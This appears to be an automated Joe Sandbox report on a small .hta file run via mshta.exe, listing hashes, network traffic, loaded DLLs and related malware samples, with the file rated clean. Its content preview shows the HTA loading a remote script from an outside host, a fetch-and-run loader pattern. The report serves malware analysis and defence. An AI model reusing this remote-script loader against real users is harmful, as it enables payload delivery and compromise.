Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
65#U2465.hta

Overview

General Information

Sample name:65#U2465.hta
renamed because original name is a hash value
Original sample name: _.hta
Analysis ID:1592542
MD5:f03c02aef6a1354ea5dc03bd1618ffaa
SHA1:6e23b3b6e6f24aaa974260c9f082fcfed0ffa122
SHA256:62091fb092ddf19b73aeb835adbb9a17fa91e00fb0bf19881b2b946078f917f0
Infos:

Detection

Score:2
Range:0 - 100
Whitelisted:false
Confidence:80%

Signatures

JA3 SSL client fingerprint seen in connection with other malware
Queries the volume information (name, serial number etc) of a device
Searches for the Microsoft Outlook file path
Uses a known web browser user agent for HTTP communication

Classification

  • System is w10x64
  • mshta.exe (PID: 7348 cmdline: mshta.exe "C:\Users\user\Desktop\65#U2465.hta" MD5: 06B02D5C097C7DB1F109749C45F3F505)
  • cleanup
No configs have been found
No yara matches
No Sigma rule has matched
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

There are no malicious signatures, click here to show all signatures.

Source: unknownHTTPS traffic detected: 208.109.233.61:443 -> 192.168.2.7:49700 version: TLS 1.2
Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: global trafficHTTP traffic detected: GET /GGOTSPH54/GGOTSPH54gerw/cPG711.js HTTP/1.1Accept: */*Accept-Language: en-CHAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 61.233.109.208.host.secureserver.netConnection: Keep-Alive
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET /GGOTSPH54/GGOTSPH54gerw/cPG711.js HTTP/1.1Accept: */*Accept-Language: en-CHAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 61.233.109.208.host.secureserver.netConnection: Keep-Alive
Source: global trafficDNS traffic detected: DNS query: 61.233.109.208.host.secureserver.net
Source: mshta.exe, 00000002.00000002.2492653436.0000000003556000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1290497699.0000000003556000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://61.233.109.208.host.secureserver.net/
Source: mshta.exe, 00000002.00000003.1290497699.0000000003556000.00000004.00000020.00020000.00000000.sdmp, 65#U2465.htaString found in binary or memory: https://61.233.109.208.host.secureserver.net/GGOTSPH54/GGOTSPH54gerw/cPG711.js
Source: mshta.exe, 00000002.00000003.1290196541.00000000035BE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000002.2492653436.00000000035BE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://61.233.109.208.host.secureserver.net/GGOTSPH54/GGOTSPH54gerw/cPG711.jsVRh
Source: mshta.exe, 00000002.00000002.2492653436.0000000003512000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1290497699.0000000003532000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://61.233.109.208.host.secureserver.net/GGOTSPH54/GGOTSPH54gerw/cPG711.jsZG
Source: mshta.exe, 00000002.00000002.2492653436.0000000003512000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1290497699.0000000003532000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://61.233.109.208.host.secureserver.net/GGOTSPH54/GGOTSPH54gerw/cPG711.jsdll~T
Source: mshta.exe, 00000002.00000003.1290497699.0000000003597000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000002.2492653436.0000000003597000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://61.233.109.208.host.secureserver.net/GGOTSPH54/GGOTSPH54gerw/cPG711.jskT
Source: mshta.exe, 00000002.00000002.2492653436.0000000003512000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1290497699.0000000003532000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://61.233.109.208.host.secureserver.net/GGOTSPH54/GGOTSPH54gerw/cPG711.jsuT
Source: mshta.exe, 00000002.00000002.2497161298.0000000006EE5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://61.233.109.208.host.secureserver.net/GGOTSPH54/GGOTSPH54gerw/cPG711.jsx
Source: mshta.exe, 00000002.00000002.2492653436.0000000003512000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1290497699.0000000003532000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://61.233.109.208.host.secureserver.net/GGOTSPH54/GGOTSPH54gerw/cPG711.js~T
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49700
Source: unknownNetwork traffic detected: HTTP traffic on port 49700 -> 443
Source: unknownHTTPS traffic detected: 208.109.233.61:443 -> 192.168.2.7:49700 version: TLS 1.2
Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
Source: classification engineClassification label: clean2.winHTA@1/0@1/1
Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: mshtml.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: powrprof.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wkscli.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msiso.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: srpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msimtf.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dxgi.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: resourcepolicyclient.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wininet.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: textinputframework.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: coreuicomponents.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dataexchange.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: d3d11.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dcomp.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: twinapi.appcore.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: schannel.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: jscript9.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msls31.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: d2d1.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dwrite.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: d3d10warp.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dxcore.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\SettingsJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: mshta.exe, 00000002.00000002.2492653436.00000000035CD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000002.2492653436.0000000003556000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1290196541.00000000035CD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1290497699.0000000003556000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\times.ttf VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformationJump to behavior
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
DLL Side-Loading
1
DLL Side-Loading
1
DLL Side-Loading
OS Credential Dumping1
Security Software Discovery
Remote Services1
Email Collection
1
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsRootkitLSASS Memory12
System Information Discovery
Remote Desktop ProtocolData from Removable Media2
Non-Application Layer Protocol
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive13
Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture1
Ingress Tool Transfer
Traffic DuplicationData Destruction
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
No Antivirus matches
No Antivirus matches
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
https://61.233.109.208.host.secureserver.net/GGOTSPH54/GGOTSPH54gerw/cPG711.jsdll~T0%Avira URL Cloudsafe
https://61.233.109.208.host.secureserver.net/GGOTSPH54/GGOTSPH54gerw/cPG711.js0%Avira URL Cloudsafe
https://61.233.109.208.host.secureserver.net/GGOTSPH54/GGOTSPH54gerw/cPG711.jsuT0%Avira URL Cloudsafe
https://61.233.109.208.host.secureserver.net/GGOTSPH54/GGOTSPH54gerw/cPG711.jsVRh0%Avira URL Cloudsafe
https://61.233.109.208.host.secureserver.net/0%Avira URL Cloudsafe
https://61.233.109.208.host.secureserver.net/GGOTSPH54/GGOTSPH54gerw/cPG711.jskT0%Avira URL Cloudsafe
https://61.233.109.208.host.secureserver.net/GGOTSPH54/GGOTSPH54gerw/cPG711.jsx0%Avira URL Cloudsafe
https://61.233.109.208.host.secureserver.net/GGOTSPH54/GGOTSPH54gerw/cPG711.js~T0%Avira URL Cloudsafe
https://61.233.109.208.host.secureserver.net/GGOTSPH54/GGOTSPH54gerw/cPG711.jsZG0%Avira URL Cloudsafe
NameIPActiveMaliciousAntivirus DetectionReputation
61.233.109.208.host.secureserver.net
208.109.233.61
truefalse
    unknown
    NameMaliciousAntivirus DetectionReputation
    https://61.233.109.208.host.secureserver.net/GGOTSPH54/GGOTSPH54gerw/cPG711.jsfalse
    • Avira URL Cloud: safe
    unknown
    NameSourceMaliciousAntivirus DetectionReputation
    https://61.233.109.208.host.secureserver.net/GGOTSPH54/GGOTSPH54gerw/cPG711.jsdll~Tmshta.exe, 00000002.00000002.2492653436.0000000003512000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1290497699.0000000003532000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    unknown
    https://61.233.109.208.host.secureserver.net/GGOTSPH54/GGOTSPH54gerw/cPG711.jsuTmshta.exe, 00000002.00000002.2492653436.0000000003512000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1290497699.0000000003532000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    unknown
    https://61.233.109.208.host.secureserver.net/GGOTSPH54/GGOTSPH54gerw/cPG711.js~Tmshta.exe, 00000002.00000002.2492653436.0000000003512000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1290497699.0000000003532000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    unknown
    https://61.233.109.208.host.secureserver.net/GGOTSPH54/GGOTSPH54gerw/cPG711.jsVRhmshta.exe, 00000002.00000003.1290196541.00000000035BE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000002.2492653436.00000000035BE000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    unknown
    https://61.233.109.208.host.secureserver.net/mshta.exe, 00000002.00000002.2492653436.0000000003556000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1290497699.0000000003556000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    unknown
    https://61.233.109.208.host.secureserver.net/GGOTSPH54/GGOTSPH54gerw/cPG711.jskTmshta.exe, 00000002.00000003.1290497699.0000000003597000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000002.2492653436.0000000003597000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    unknown
    https://61.233.109.208.host.secureserver.net/GGOTSPH54/GGOTSPH54gerw/cPG711.jsxmshta.exe, 00000002.00000002.2497161298.0000000006EE5000.00000004.00000800.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    unknown
    https://61.233.109.208.host.secureserver.net/GGOTSPH54/GGOTSPH54gerw/cPG711.jsZGmshta.exe, 00000002.00000002.2492653436.0000000003512000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1290497699.0000000003532000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    unknown
    • No. of IPs < 25%
    • 25% < No. of IPs < 50%
    • 50% < No. of IPs < 75%
    • 75% < No. of IPs
    IPDomainCountryFlagASNASN NameMalicious
    208.109.233.61
    61.233.109.208.host.secureserver.netUnited States
    26496AS-26496-GO-DADDY-COM-LLCUSfalse
    Joe Sandbox version:42.0.0 Malachite
    Analysis ID:1592542
    Start date and time:2025-01-16 09:14:22 +01:00
    Joe Sandbox product:CloudBasic
    Overall analysis duration:0h 4m 2s
    Hypervisor based Inspection enabled:false
    Report type:full
    Cookbook file name:default.jbs
    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
    Number of analysed new started processes analysed:13
    Number of new started drivers analysed:0
    Number of existing processes analysed:0
    Number of existing drivers analysed:0
    Number of injected processes analysed:0
    Technologies:
    • EGA enabled
    • AMSI enabled
    Analysis Mode:default
    Analysis stop reason:Timeout
    Sample name:65#U2465.hta
    renamed because original name is a hash value
    Original Sample Name: _.hta
    Detection:CLEAN
    Classification:clean2.winHTA@1/0@1/1
    Cookbook Comments:
    • Found application associated with file extension: .hta
    • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
    • Excluded IPs from analysis (whitelisted): 13.107.246.45, 184.28.90.27, 4.245.163.56
    • Excluded domains from analysis (whitelisted): fs.microsoft.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
    • Not all processes where analyzed, report is missing behavior information
    • Report size getting too big, too many NtOpenKeyEx calls found.
    • Report size getting too big, too many NtProtectVirtualMemory calls found.
    • Report size getting too big, too many NtQueryValueKey calls found.
    No simulations
    No context
    No context
    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
    AS-26496-GO-DADDY-COM-LLCUSORDER-202577008.lnkGet hashmaliciousUnknownBrowse
    • 166.62.28.147
    PI ITS15235 (2).docGet hashmaliciousDBatLoader, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
    • 166.62.27.188
    Subscription_Renewal_Receipt_2025.htmGet hashmaliciousUnknownBrowse
    • 68.178.204.95
    http://petruccilaw.com/Get hashmaliciousUnknownBrowse
    • 107.180.51.237
    NLWfV87ouS.dllGet hashmaliciousWannacryBrowse
    • 72.167.90.1
    http://www.northamericaniron.comGet hashmaliciousUnknownBrowse
    • 50.63.8.11
    https://www.xrmtoolbox.com/Get hashmaliciousUnknownBrowse
    • 50.63.8.184
    mips.elfGet hashmaliciousUnknownBrowse
    • 68.178.237.155
    UTstKgkJNY.exeGet hashmaliciousDBatLoaderBrowse
    • 166.62.27.188
    On9ahUpI4R.exeGet hashmaliciousDBatLoaderBrowse
    • 166.62.27.188
    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
    37f463bf4616ecd445d4a1937da06e19scan file.Vbs.vbsGet hashmaliciousFormBookBrowse
    • 208.109.233.61
    file.dllGet hashmaliciousMatanbuchusBrowse
    • 208.109.233.61
    Purchase Order No.5817-0001142025.bat.exeGet hashmaliciousRemcos, GuLoaderBrowse
    • 208.109.233.61
    Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exeGet hashmaliciousRemcos, GuLoaderBrowse
    • 208.109.233.61
    153776434-874356550.05.exeGet hashmaliciousUnknownBrowse
    • 208.109.233.61
    download.bin.exeGet hashmaliciousNjrat, XRedBrowse
    • 208.109.233.61
    Handler.exeGet hashmaliciousDanaBot, PureLog Stealer, VidarBrowse
    • 208.109.233.61
    BNXCXCJSD.jseGet hashmaliciousMassLogger RATBrowse
    • 208.109.233.61
    setup.msiGet hashmaliciousUnknownBrowse
    • 208.109.233.61
    No context
    No created / dropped files found
    File type:HTML document, ASCII text, with CRLF line terminators
    Entropy (8bit):5.338733812093614
    TrID:
    • HyperText Markup Language (15015/1) 20.56%
    • HyperText Markup Language (12001/1) 16.44%
    • HyperText Markup Language (12001/1) 16.44%
    • HyperText Markup Language (11501/1) 15.75%
    • HyperText Markup Language (11501/1) 15.75%
    File name:65#U2465.hta
    File size:379 bytes
    MD5:f03c02aef6a1354ea5dc03bd1618ffaa
    SHA1:6e23b3b6e6f24aaa974260c9f082fcfed0ffa122
    SHA256:62091fb092ddf19b73aeb835adbb9a17fa91e00fb0bf19881b2b946078f917f0
    SHA512:9981c9fddf660b17a83616f3eaab0780c9de28953b32b80d4afd406d8545921f1fd455164e9bb0a3141a14ed9b452fc5d9874eab8e8eb5ccbd02f9d679043ce9
    SSDEEP:6:h4QzhqIKAEtEvt9GQcXqiRkiR84/MfKYkVfAbpli7C/Uury50Mf4QfW99XfGb:hPEhaDXiGiG4/MfACy7C/zG5LfRfSBGb
    TLSH:77E068AE05828C0902B0A73068E5F0DCA852684A67824E017DC961471F6A760ECC3288
    File Content Preview:<!DOCTYPE html>..<html lang="en">..<head>..<script src="https://61.233.109.208.host.secureserver.net/GGOTSPH54/GGOTSPH54gerw/cPG711.js">..HTSv85Kp8HPY9....</script>.. <meta charset="UTF-8">.. <meta name="viewport" content="width=device-width, initia
    TimestampSource PortDest PortSource IPDest IP
    Jan 16, 2025 09:15:20.313498020 CET49700443192.168.2.7208.109.233.61
    Jan 16, 2025 09:15:20.313560963 CET44349700208.109.233.61192.168.2.7
    Jan 16, 2025 09:15:20.313745022 CET49700443192.168.2.7208.109.233.61
    Jan 16, 2025 09:15:20.378810883 CET49700443192.168.2.7208.109.233.61
    Jan 16, 2025 09:15:20.378830910 CET44349700208.109.233.61192.168.2.7
    Jan 16, 2025 09:15:20.959083080 CET44349700208.109.233.61192.168.2.7
    Jan 16, 2025 09:15:20.959351063 CET49700443192.168.2.7208.109.233.61
    Jan 16, 2025 09:15:21.014904976 CET49700443192.168.2.7208.109.233.61
    Jan 16, 2025 09:15:21.014934063 CET44349700208.109.233.61192.168.2.7
    Jan 16, 2025 09:15:21.015985012 CET44349700208.109.233.61192.168.2.7
    Jan 16, 2025 09:15:21.016107082 CET49700443192.168.2.7208.109.233.61
    Jan 16, 2025 09:15:21.019505978 CET49700443192.168.2.7208.109.233.61
    Jan 16, 2025 09:15:21.063338041 CET44349700208.109.233.61192.168.2.7
    Jan 16, 2025 09:15:21.468095064 CET44349700208.109.233.61192.168.2.7
    Jan 16, 2025 09:15:21.468163967 CET49700443192.168.2.7208.109.233.61
    Jan 16, 2025 09:15:21.468183994 CET44349700208.109.233.61192.168.2.7
    Jan 16, 2025 09:15:21.468233109 CET49700443192.168.2.7208.109.233.61
    Jan 16, 2025 09:15:21.468261003 CET44349700208.109.233.61192.168.2.7
    Jan 16, 2025 09:15:21.468590021 CET49700443192.168.2.7208.109.233.61
    Jan 16, 2025 09:15:21.469031096 CET49700443192.168.2.7208.109.233.61
    Jan 16, 2025 09:15:21.469049931 CET44349700208.109.233.61192.168.2.7
    Jan 16, 2025 09:15:21.469247103 CET49700443192.168.2.7208.109.233.61
    Jan 16, 2025 09:15:21.469247103 CET49700443192.168.2.7208.109.233.61
    TimestampSource PortDest PortSource IPDest IP
    Jan 16, 2025 09:15:20.291137934 CET5177953192.168.2.71.1.1.1
    Jan 16, 2025 09:15:20.303540945 CET53517791.1.1.1192.168.2.7
    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
    Jan 16, 2025 09:15:20.291137934 CET192.168.2.71.1.1.10xe73cStandard query (0)61.233.109.208.host.secureserver.netA (IP address)IN (0x0001)false
    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
    Jan 16, 2025 09:15:20.303540945 CET1.1.1.1192.168.2.70xe73cNo error (0)61.233.109.208.host.secureserver.net208.109.233.61A (IP address)IN (0x0001)false
    • 61.233.109.208.host.secureserver.net
    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
    0192.168.2.749700208.109.233.614437348C:\Windows\SysWOW64\mshta.exe
    TimestampBytes transferredDirectionData
    2025-01-16 08:15:21 UTC353OUTGET /GGOTSPH54/GGOTSPH54gerw/cPG711.js HTTP/1.1
    Accept: */*
    Accept-Language: en-CH
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
    Host: 61.233.109.208.host.secureserver.net
    Connection: Keep-Alive
    2025-01-16 08:15:21 UTC174INData Raw: 48 54 54 50 2f 31 2e 30 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 44 61 74 65 3a 20 54 68 75 2c 20 31 36 20 4a 61 6e 20 32 30 32 35 20 30 38 3a 31 35 3a 32 31 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 30 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 3b 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 0d 0a
    Data Ascii: HTTP/1.0 404 Not FoundDate: Thu, 16 Jan 2025 08:15:21 GMTServer: Apache/2.4.41 (Ubuntu)Content-Length: 0Connection: closeContent-Type: text/plain;;charset=UTF-8


    Click to jump to process

    Click to jump to process

    Target ID:2
    Start time:03:15:18
    Start date:16/01/2025
    Path:C:\Windows\SysWOW64\mshta.exe
    Wow64 process (32bit):true
    Commandline:mshta.exe "C:\Users\user\Desktop\65#U2465.hta"
    Imagebase:0x750000
    File size:13'312 bytes
    MD5 hash:06B02D5C097C7DB1F109749C45F3F505
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Reputation:moderate
    Has exited:false

    No disassembly